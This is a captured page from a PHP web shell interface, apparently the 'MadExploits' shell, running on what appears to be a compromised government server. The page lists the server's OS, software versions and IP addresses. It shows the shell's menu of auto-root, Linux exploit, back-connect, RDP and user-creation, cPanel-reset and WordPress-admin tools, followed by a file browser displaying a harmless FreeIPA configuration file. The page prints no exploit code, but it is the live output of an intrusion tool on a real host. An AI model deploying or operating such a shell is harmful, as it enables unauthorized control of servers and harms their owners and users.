Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
ipa /
ipaclient /
[ HOME SHELL ]
Name
Size
Permission
Action
ipa.cfg
789
B
-rw-r--r--
ipa.js
1.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ipa.js
/* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ try { /* Kerberos SSO configuration */ lockPref("network.negotiate-auth.trusted-uris", ".freeipa.org"); lockPref("network.negotiate-auth.delegation-uris", ".freeipa.org"); /* These are the defaults */ lockPref("network.negotiate-auth.gsslib", ""); lockPref("network.negotiate-auth.using-native-gsslib", true); lockPref("network.negotiate-auth.allow-proxies", true); /* For Windows */ lockPref("network.auth.use-sspi", false); } catch(e) { displayError("Error in Autoconfig", e); }
Close